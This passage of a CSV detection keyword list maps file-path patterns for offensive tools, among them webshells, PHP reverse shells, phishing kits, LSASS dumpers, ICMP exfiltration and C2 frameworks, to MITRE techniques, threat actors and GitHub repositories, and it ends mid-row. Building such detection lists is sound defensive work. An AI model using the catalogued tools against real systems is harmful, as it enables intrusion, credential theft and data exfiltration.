"*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9646"
"*/PEzor.py*",".{0,1000}\/PEzor\.py.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9647"
"*/PEzor.sh *",".{0,1000}\/PEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9648"
"*/PEzor/inject.cpp*",".{0,1000}\/PEzor\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9649"
"*/pfsense_clickjacking*",".{0,1000}\/pfsense_clickjacking.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9650"
"*/pgsql-brute.nse*",".{0,1000}\/pgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9657"
"*/Phant0m.git*",".{0,1000}\/Phant0m\.git.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","9658"
"*/phant0m-exe*",".{0,1000}\/phant0m\-exe.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","9659"
"*/PhishCreds.ps1*",".{0,1000}\/PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9660"
"*/phishery.exe*",".{0,1000}\/phishery\.exe.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","9661"
"*/phishery.git*",".{0,1000}\/phishery\.git.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","9662"
"*/phishery/releases/download/*",".{0,1000}\/phishery\/releases\/download\/.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","9663"
"*/phishing.py*",".{0,1000}\/phishing\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","9664"
"*/Phishing.sh*",".{0,1000}\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9665"
"*/phishing/*.html*",".{0,1000}\/phishing\/.{0,1000}\.html.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9666"
"*/phishing/password_box*",".{0,1000}\/phishing\/password_box.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","9667"
"*/phishing-HTML-linter.py*",".{0,1000}\/phishing\-HTML\-linter\.py.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","9668"
"*/PhishingServer/*",".{0,1000}\/PhishingServer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","9669"
"*/phishlets/example.yaml*",".{0,1000}\/phishlets\/example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","9670"
"*/php_custom_spy_for_mysql.php*",".{0,1000}\/php_custom_spy_for_mysql\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9671"
"*/php_reverse_shell.php*",".{0,1000}\/php_reverse_shell\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9672"
"*/php_webshell.py*",".{0,1000}\/php_webshell\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9673"
"*/php-backdoor.php*",".{0,1000}\/php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","9674"
"*/php-backdoor.php*",".{0,1000}\/php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9675"
"*/phpkit.py*",".{0,1000}\/phpkit\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9676"
"*/phpkitcli.py*",".{0,1000}\/phpkitcli\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9677"
"*/PHPRemoteView.php*",".{0,1000}\/PHPRemoteView\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9678"
"*/php-reverse-shell.git*",".{0,1000}\/php\-reverse\-shell\.git.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9679"
"*/php-reverse-shell/releases/*",".{0,1000}\/php\-reverse\-shell\/releases\/.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9680"
"*/php-reverse-shell/zipball/*",".{0,1000}\/php\-reverse\-shell\/zipball\/.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","9681"
"*/phpshell.php*",".{0,1000}\/phpshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9682"
"*/phpsploit.git*",".{0,1000}\/phpsploit\.git.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","9683"
"*/phpsploit-config*",".{0,1000}\/phpsploit\-config.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#linux","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","9684"
"*/PHPSPY.php*",".{0,1000}\/PHPSPY\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9685"
"*/PHVNC.exe*",".{0,1000}\/PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9686"
"*/physmem2minidump.py*",".{0,1000}\/physmem2minidump\.py.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","9687"
"*/physmem2profit.git*",".{0,1000}\/physmem2profit\.git.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","9688"
"*/PickleC2.git*",".{0,1000}\/PickleC2\.git.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","9689"
"*/pico_plus_user.sql*",".{0,1000}\/pico_plus_user\.sql.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","9690"
"*/pid:1337 */dll:*",".{0,1000}\/pid\:1337\s.{0,1000}\/dll\:.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","9691"
"*/PILOT/ATC.py*",".{0,1000}\/PILOT\/ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","9692"
"*/PILOT/PILOT.ps1*",".{0,1000}\/PILOT\/PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","9693"
"*/ping6.py*",".{0,1000}\/ping6\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9694"
"*/PingRAT.git*",".{0,1000}\/PingRAT\.git.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","9698"
"*/pipe/RustPotato*",".{0,1000}\/pipe\/RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content #namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","9699"
"*/PipeViewer.exe*",".{0,1000}\/PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9700"
"*/PipeViewer.git*",".{0,1000}\/PipeViewer\.git.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9701"
"*/PipeViewer.sln*",".{0,1000}\/PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9702"
"*/PipeViewer/Program.cs*",".{0,1000}\/PipeViewer\/Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","9703"
"*/pitty_tiger.profile*",".{0,1000}\/pitty_tiger\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 